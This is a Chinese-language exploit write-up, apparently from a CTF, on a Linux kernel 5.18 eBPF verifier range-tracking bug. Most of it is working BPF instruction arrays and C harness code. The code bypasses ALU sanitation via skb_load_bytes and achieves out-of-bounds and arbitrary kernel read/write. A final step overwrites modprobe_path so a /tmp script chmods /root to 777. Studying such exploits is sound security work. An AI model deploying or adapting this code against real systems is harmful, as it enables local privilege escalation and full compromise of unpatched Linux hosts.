	u32 id;
	int numa_node;
	u32 btf_key_type_id;
	u32 btf_value_type_id;
	u32 btf_vmlinux_value_type_id;
	struct btf *btf;
#ifdef CONFIG_MEMCG_KMEM
	struct mem_cgroup *memcg;
#endif
	char name[BPF_OBJ_NAME_LEN];
	bool bypass_spec_v1;
	bool frozen; /* write-once; write-protected by freeze_mutex */
	/* 14 bytes hole */

	/* The 3rd and 4th cacheline with misc members to avoid false sharing
	 * particularly with refcounting.
	 */
	atomic64_t refcnt ____cacheline_aligned;
	atomic64_t usercnt;
	struct work_struct work;
	struct mutex freeze_mutex;
	atomic64_t writecnt;
	/* 'Ownership' of program-containing map is claimed by the first program
	 * that is going to use this map or by the first program which FD is
	 * stored in the map to make sure that all callers and callees have the
	 * same prog type, JITed flag and xdp_has_frags flag.
	 */
	struct {
		spinlock_t lock;
		enum bpf_prog_type type;
		bool jited;
		bool xdp_has_frags;
	} owner;
};

root 测试 oob

正如前文提到的，ALU sanitation 的缓解机制使得不能像以前那样简单的 oob 利用。

事实上如果函数 bpf_bypass_spec_v1 函数返回 true，则会绕过 ALU sanitation。这个函数对 root 权限返回真，所以你仍然可以用 root 权限尝试超出范围的引用。

因此，让我们首先尝试用 root 权限做一个”简单的”范围外的引用。

破坏跟踪范围以创造一个常量

利用 verifier 错误的一个方便的方法是创建一个常数（XX！=Y），verifier 认为是 X，但实际上是 Y。特别是，当X=0,Y!=0 时，为超出范围的引用创建偏移量是很方便的，因为无论它被乘以什么，verifier 都判断它是0。

首先，让我们创建一个 “验证者认为是 0 但实际上是 1 的常数”。现在 R1 的 u32_min_value为1，u32_max_value 为0。相反，在R2中放一个值，其中 u32_min_value 为 0，u32_max_value 为 1（不破坏跟踪）。现在考虑 R1 和 R2 的相加，我们看到范围是 [1,0] + [0,1] = [1,1]。具有相同最小值和最大值的寄存器在 MOV 和其他操作下被视为常数，R1 的实际值为 1，而 R2 取 0 或 1。因此，加法的结果必须是 [1,2]。然而，verifier 判断加法后的 R1 是一个常数 1，这就包括了 R1 的实际值是 2 的情况。然后我们可以从 R1 中减去 1，以产生所需的 “verifier 认为是 0 但实际上是 1 的常数”。

u32_min_value 为 0 和 u32_max_value 为 1 的 R2 可以通过结合逻辑和算术运算或在条件分支中放弃大于1的情况来创建。

int mapfd = map_create(8, 1);
char verifier_log[0x10000];
unsigned long val;
val = 1;
map_update(mapfd, 0, &val);

struct bpf_insn insns[] = 
{
    // R0 => &map[0]
    BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0), // key=0
    BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -8),
    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), // map_lookup_elem(mapfd, &k)
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
    BPF_EXIT_INSN(),
    BPF_MOV64_REG(BPF_REG_9, BPF_REG_0),

    // R1 --> var_off=(value=0; mask=0xffffffff00000000)
    BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_9, 0),	// reg1=*(u64 *)reg9 reg1=1?
    BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32),
    BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32),

    // R2 --> var_off=(value=0xfffffffe00000001; mask=0)
    BPF_MOV64_IMM(BPF_REG_2, 0xfffffffe),
    BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1),

    // R1 --> (s32_min=1, s32_max=0, u32_min=1, u32_max=0)  real:1
    BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2),

    // R2 --> (s32_min=0, s32_max=1, u32_min=0, u32_max=1)  real:1
    BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_9, 0),
    BPF_JMP32_IMM(BPF_JLE, BPF_REG_2, 1, 2), // REG_2 < 1 ? JMP pc+2 : EXIT
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN(),

    // R1 --> 0	 real:1
    BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_2),
    BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),
    BPF_ALU64_IMM(BPF_SUB, BPF_REG_1, 1),

    BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_1, -0x10),
    BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), 
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08), // key
    BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),    
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10), // value
    BPF_MOV64_IMM(BPF_REG_ARG4, 0),              // flags
    BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

    BPF_MOV64_REG(BPF_REG_0, 0),
    BPF_EXIT_INSN(),
};

上面的指令可以完成读出实际 r1 真正值的操作。最终 map_lookup 的时候返回 1。

&map[0] 后向的数据泄露

扩大战果，将推测为 0，实际为 1 的 R1 直接进行一个乘，便可以实现向后任意偏移的读：

val = 1;
map_update(mapfd, 0, &val);
struct bpf_insn insns[] = 
{
    // R0 => &map[0]
    BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0), // key=0
    BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -8),
    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), // map_lookup_elem(mapfd, &k)
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
    BPF_EXIT_INSN(),
    BPF_MOV64_REG(BPF_REG_9, BPF_REG_0), 	 // R9 => &map[0]

    // R1 --> var_off=(value=0; mask=0xffffffff00000000)
    BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_9, 0),
    BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32),
    BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32),

    // R2 --> var_off=(value=0xfffffffe00000001; mask=0)
    BPF_MOV64_IMM(BPF_REG_2, 0xfffffffe),
    BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1),

    // R1 --> (s32_min=1, s32_max=0, u32_min=1, u32_max=0)  real:1
    BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2),

    // R2 --> (s32_min=0, s32_max=1, u32_min=0, u32_max=1)  real:1
    BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_9, 0),
    BPF_JMP32_IMM(BPF_JLE, BPF_REG_2, 1, 2), // REG_2 < 1 ? JMP $+2 : EXIT
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN(),

    // R1 --> 0	 real:1
    BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_2),
    BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),
    BPF_ALU64_IMM(BPF_SUB, BPF_REG_1, 1),

    // R1 --> 0 actual: 0x100
    BPF_ALU64_IMM(BPF_MUL, BPF_REG_1, 0x100),		// !!!

    BPF_MOV64_REG(BPF_REG_3, BPF_REG_9),
    BPF_ALU64_REG(BPF_ADD, BPF_REG_3, BPF_REG_1),	// reg3 = reg1 + &map[0]
    BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),	// reg2 = *(u64 *)reg3

    BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_2, -0x10), // *(u64 *)(fp-0x10)=reg2
    BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), 
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08), // key
    BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),    
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10), // value
    BPF_MOV64_IMM(BPF_REG_ARG4, 0),              // flags
    BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

    BPF_MOV64_REG(BPF_REG_0, 0),
    BPF_EXIT_INSN(),
};

int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
if (progfd == -1) fatal("[-] bpf(BPF_PROG_LOAD)");

int socks[2];
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) 
    fatal("socketpair");
if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))
    fatal("setsockopt");

printf("[+] write.\n");
write(socks[1], "Hello", 5);

map_lookup(mapfd, 0, &val);
printf("val = 0x%016lx\n", val);

printf("%s\n", verifier_log);
getchar();

可以看到有很多内核代码段地址可以用来绕过 kaslr（但是稳不稳定没有测试）。

请注意，当常数 0x100 作为 MOV 传递时，验证器会检测到超范围引用，表明该漏洞可以导致超范围引用。然而，如果同一程序以普通用户的权限执行，就不会有数据泄露，因为ALU sanitation 会将超出范围的引用通过加法转换为 0 的加法，如下图所示。 (从一开始就放入的值1被取出，这也表明由于ALU的卫生问题，加法是没有意义的）。

在没有ALU sanitation 的年代，这种技术是对读/写 bpf_map 结构 ops 等最常见的攻击。

别忘了，此时我们是 root 权限在测试。

普通用户绕过 ALU sanitation

幸运的是，在本文讨论的内核 v5.18.14 中，有一种方法可以绕过 ALU sanitation。这个思路是让一个现有的辅助函数工作，因为对指针的加减法（超出范围的）会被修补。

普通用户可以使用的辅助函数很少，但让我们看看以偏移量和大小为参数的函数。函数 skb_load_bytes 就可以在 socket filter 中使用：


BPF_CALL_4(bpf_skb_load_bytes, const struct sk_buff *, skb, u32, offset,
	   void *, to, u32, len)
{
	void *ptr;

	if (unlikely(offset > INT_MAX))
		goto err_clear;

	ptr = skb_header_pointer(skb, offset, len, to);
	if (unlikely(!ptr))
		goto err_clear;
	if (ptr != to)
		memcpy(to, ptr, len);

	return 0;
err_clear:
	memset(to, 0, len);
	return -EFAULT;
}

static const struct bpf_func_proto bpf_skb_load_bytes_proto = {
	.func		= bpf_skb_load_bytes,
	.gpl_only	= false,
	.ret_type	= RET_INTEGER,
	.arg1_type	= ARG_PTR_TO_CTX,
	.arg2_type	= ARG_ANYTHING,
	.arg3_type	= ARG_PTR_TO_UNINIT_MEM,
	.arg4_type	= ARG_CONST_SIZE,
};

该函数允许将数据包的内容复制到 BPF 端（映射或堆栈）。

指定第一个参数为上下文，第二个参数为要复制的数据包的偏移量，第三个参数为目标缓冲区，第四个参数为要复制的大小。拷贝的源头是数据包，所以通过 write 发送至套接字的数据会被拷贝。当这个函数被调用时，它会确定参数是否超出了范围，但不受 ALU sanitation 的影响。让我们来试一试。现在，BPF 映射的数据大小是8，所以如果你能复制超过8个字节，你就成功了!

创建一个寄存器，使验证器判断其为1，而实际值为0x10。用写的方式发送超过0x10字节的数据，用 gdb 检查它是否被复制到映射上。（注意，如果你传递0（或一个假定值）作为大小，verifier 将被提醒）

上述程序会将带有 skb_load_bytes 的数据包写入 BPF 映射的第0个元素（该元素存储在地址 R9，是第一次获得的地方）。实际上写的是0x10个字节，但 verifier 推测是1个字节，所以允许写。

调用程序时，发送0x10字节的数据，如下所示：

// R8 --> context
BPF_MOV64_REG(BPF_REG_8, BPF_REG_1),
// ···
// R1 --> 1 / actual: 0x10		注意顺序不可以反 先加成1后，实际和真实都是0x10了
BPF_ALU64_IMM(BPF_MUL, BPF_REG_1, 0x10-1),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 1),

BPF_MOV64_IMM(BPF_REG_ARG2, 0),			 // arg2=offset  (0)
BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_9),  // arg3=to      (&map[0])
BPF_MOV64_REG(BPF_REG_ARG4, BPF_REG_1),  // arg4=len     (0x10)
BPF_MOV64_REG(BPF_REG_ARG1, BPF_REG_8),  // arg1=skb
BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),
// ----------------------------------------------------------------
char payload[0x10];
*(unsigned long*)&payload[0] = 0x4141414141414141;
*(unsigned long*)&payload[8] = 0xdeadbeefcafebabe;
write(socks[1], payload, 0x10);

此步完整的代码段

int mapfd = map_create(8, 1);
char verifier_log[0x10000];
unsigned long val;

unsigned long map_addr = leak_map_addr(mapfd);
printf("[+] map_addr => 0x%016lx\n", map_addr);

val = 1;
map_update(mapfd, 0, &val);
struct bpf_insn insns[] = 
{
    // R8 --> context
    BPF_MOV64_REG(BPF_REG_8, BPF_REG_1),

    // R0 => &map[0]
    BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0), // key=0
    BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -8),
    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), // map_lookup_elem(mapfd, &k)
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
    BPF_EXIT_INSN(),
    BPF_MOV64_REG(BPF_REG_9, BPF_REG_0),

    // R1 --> var_off=(value=0; mask=0xffffffff00000000)
    BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_9, 0),
    BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32),
    BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32),

    // R2 --> var_off=(value=0xfffffffe00000001; mask=0)
    BPF_MOV64_IMM(BPF_REG_2, 0xfffffffe),
    BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1),

    // R1 --> (s32_min=1, s32_max=0, u32_min=1, u32_max=0)  real:1
    BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2),

    // R2 --> (s32_min=0, s32_max=1, u32_min=0, u32_max=1)  real:1
    BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_9, 0),
    BPF_JMP32_IMM(BPF_JLE, BPF_REG_2, 1, 2), // REG_2 < 1 ? JMP $+2 : EXIT
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN(),

    // R1 --> 0	 real:1
    BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_2),
    BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),
    BPF_ALU64_IMM(BPF_SUB, BPF_REG_1, 1),

    // R1 --> 1 / actual: 0x10
    BPF_ALU64_IMM(BPF_MUL, BPF_REG_1, 0x10-1),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 1),

    BPF_MOV64_IMM(BPF_REG_ARG2, 0),			 // arg2=offset  (0)
    BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_9),  // arg3=to      (&map[0])
    BPF_MOV64_REG(BPF_REG_ARG4, BPF_REG_1),  // arg4=len     (0x10)
    BPF_MOV64_REG(BPF_REG_ARG1, BPF_REG_8),  // arg1=skb
    BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

    BPF_MOV64_REG(BPF_REG_0, 0),
    BPF_EXIT_INSN(),
};

union bpf_attr prog_attr = 
{
    .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
    .insn_cnt = sizeof(insns) / sizeof(insns[0]),
    .insns = (uint64_t)insns,
    .license = (uint64_t)"GPL v2",
    .log_level = 2,
    .log_size = sizeof(verifier_log),
    .log_buf = (uint64_t)verifier_log,
};

int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
if (progfd == -1) fatal("[-] bpf(BPF_PROG_LOAD)");

int socks[2];
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) 
    fatal("socketpair");
if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))
    fatal("setsockopt");

printf("[+] write.\n");
char payload[0x10];
*(unsigned long*)&payload[0] = 0x4141414141414141;
*(unsigned long*)&payload[8] = 0xdeadbeefcafebabe;
write(socks[1], payload, 0x10);

map_lookup(mapfd, 0, &val);
printf("val = 0x%016lx\n", val);

执行结果如图，显然超出了 8 字节：

现在，在堆上的 oob write 已经实现了，剩下的可以用任何你喜欢的方式来利用。例如，你可以把两张 BPF 映射并排放在一起，并覆写后面的映射的内容。接下来就利用 BPF 的特点来实现AAR/AAW。

AAR/AAW

回顾一下，指针可以被写入 BPF 栈。对存储在栈中的数据进行类型和范围追踪。因此可以尝试通过skb_load_bytes 在栈上进行的 oob write，覆写栈上的指针为数据包中构造好的数据。在被覆盖后，verifier 仍然将其识别为一个指针，因此可以读写我们构造的指针。如下图所示：

用 BPF_STX_MEM 放置指针在 FP-0x18，通过 oob write FP-0x20 就可以覆写该字段。

// arbRead
struct bpf_insn insns[] = 
{
    ···
    BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_9, -0x18),

    // R1 --> 1 / actual: 0x10
    BPF_ALU64_IMM(BPF_MUL, BPF_REG_1, 0x10-1),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 1),

    BPF_MOV64_IMM(BPF_REG_ARG2, 0),			 	  // arg2=offset  (0)
    BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3=to      (FP-0x20)
    BPF_MOV64_REG(BPF_REG_ARG4, BPF_REG_1),       // arg4=len     (0x10)
    BPF_MOV64_REG(BPF_REG_ARG1, BPF_REG_8),       // arg1=skb
    BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

    BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_FP, -0x18),
    BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_0, 0),

    BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_1, -0x10), // *(u64 *)(fp-0x10)=reg2
    BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), 
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08), // key
    BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),    
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10), // value
    BPF_MOV64_IMM(BPF_REG_ARG4, 0),              // flags
    BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

    BPF_MOV64_REG(BPF_REG_0, 0),
    BPF_EXIT_INSN(),
};

struct bpf_insn insns[] = {
    ···
    // FP-0x18 设置为一个指针值 (*) &map[0]
    BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_9, -0x18),

    // R1 --> 1 / actual: 0x10
    BPF_ALU64_IMM(BPF_MUL, BPF_REG_1, 0x10-1),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 1),

    // (*) 绕过 ALU sanitation
    BPF_MOV64_IMM(BPF_REG_ARG2, 0),              // arg2=offset  (0)
    BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),     // arg3=to      (FP-0x20)
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),
    BPF_MOV64_REG(BPF_REG_ARG4, BPF_REG_1),      // arg4=len     (0x10)
    BPF_MOV64_REG(BPF_REG_ARG1, BPF_REG_8),      // arg1=skb
    BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

    // reg0 = *(u64 *)(FP-0x18)
    BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_FP, -0x18),

    // 任意地址写
    BPF_MOV64_IMM(BPF_REG_1, value >> 32),
    BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, value & 0xffffffff),
    BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_1, 0), // 偽ポインタへの書き込み

    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN(),
};

执行任意指令

最终泄露了 kernel_base 以后，就可以通过任意地址写，将 “/tmp/x” 写入 modprobe_path。读取flag。

system("echo -e '#!/bin/sh\nchmod -R 777 /root' > /tmp/x");
system("chmod +x /tmp/x");
system("echo -e '\xde\xad\xbe\xef' > /tmp/pwn");
system("chmod +x /tmp/pwn");
system("/tmp/pwn");

总结

ebpf 通过寄存器读/写指定地址很方便，尤其是通过栈指针，像是在写更简洁的 shellcode。有一些绕过和 fake 的思路和 v8 很像，可能这就是 JIT 的相通性吧。

环境和完整的 exp 都可以在下面参考文章中找到。